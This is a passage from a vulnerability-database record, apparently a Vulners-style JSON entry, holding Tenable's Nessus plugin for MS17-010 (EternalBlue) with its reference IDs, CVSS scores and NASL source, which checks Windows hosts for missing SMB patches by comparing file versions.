"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KB4012215", "KB4012606", "KB4013389", "KB4012598", "KB4013198"], "type": "mskb"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": 
["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MS17-010.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-02-21T01:29:44", "value": 7.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": 
"#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:32\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of 
patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", 
arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", 
bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2019-02-21T01:29:44", "differentElements": ["cvelist", "cvss", "cvss3", "description", "href", "modified", "reporter", "sourceData"], "edition": 3}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "f5a827d66102365afa1f484cc669d6442b467535d28f86ec3af0bbbcc34f5c23", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. 
An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2020-06-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-06-01T04:18:42", "history": [], "viewCount": 2786, "enchantments": {"dependencies": {"modified": "2020-06-01T04:18:42", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371", "MYHACK58:62201785243", 
"MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46"], "type": "saint"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27607", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": 
"openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MS17-010.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-01T04:18:42", "rev": 2, "value": 7.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server 
(4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n 